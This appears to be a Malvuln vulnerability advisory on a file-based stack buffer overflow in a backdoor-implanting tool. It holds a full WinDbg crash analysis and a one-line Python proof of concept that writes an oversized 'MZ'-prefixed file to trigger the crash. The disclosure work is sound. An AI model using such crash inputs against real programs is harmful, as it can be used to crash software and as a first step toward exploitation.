Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Nucleroot.mf Vulnerability: Stack Buffer Overflow Description: Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The Backdoor tool doesnt properly check the files it loads and falls victim to a file based local buffer overflow. Type: PE32 MD5: 8de56eef118187a89eeab972288ce94d Vuln ID: MVID-2021-0420 ASLR: False DEP: False Safe SEH: True Disclosure: 12/11/2021 Memory Dump: (1790.60): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003 eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 ntdll!ZwWaitForMultipleObjects+0xc: 7770ed3c c21400 ret 14h 0:000> .ecxr eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8 eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 *** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d Backdoor_Win32_Nucleroot_mf+0x90e3: 004090e3 813850450000 cmp dword ptr [eax],4550h ds:002b:454e4141=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: Backdoor_Win32_Nucleroot_mf+90e3 004090e3 813850450000 cmp dword ptr [eax],4550h EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 454e4141 Attempt to read from address 454e4141 PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 454e4141 READ_ADDRESS: 454e4141 FOLLOWUP_IP: Backdoor_Win32_Nucleroot_mf+90e3 004090e3 813850450000 cmp dword ptr [eax],4550h MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000060 BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3 0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2 0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24 0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690 0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01 0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d 0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe 0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f 0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604 0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604 0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607 0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0 0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664 0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615 0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659 0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982 0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b 0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655 0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f 0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f 0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f 0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33 0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d 0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33 0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053 0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a 0042fd00 006d0049 00670061 00000065 00610042 0x66004f 0042fd04 00670061 00000065 00610042 00650073 0x6d0049 0042fd08 00000000 00610042 00650073 0066004f 0x670061 STACK_COMMAND: ~0s; .ecxr ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Nucleroot_mf IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74 FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3 Exploit/PoC: python -c "print( 'MZ'+'A'*20000)" > DOOM.exe Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).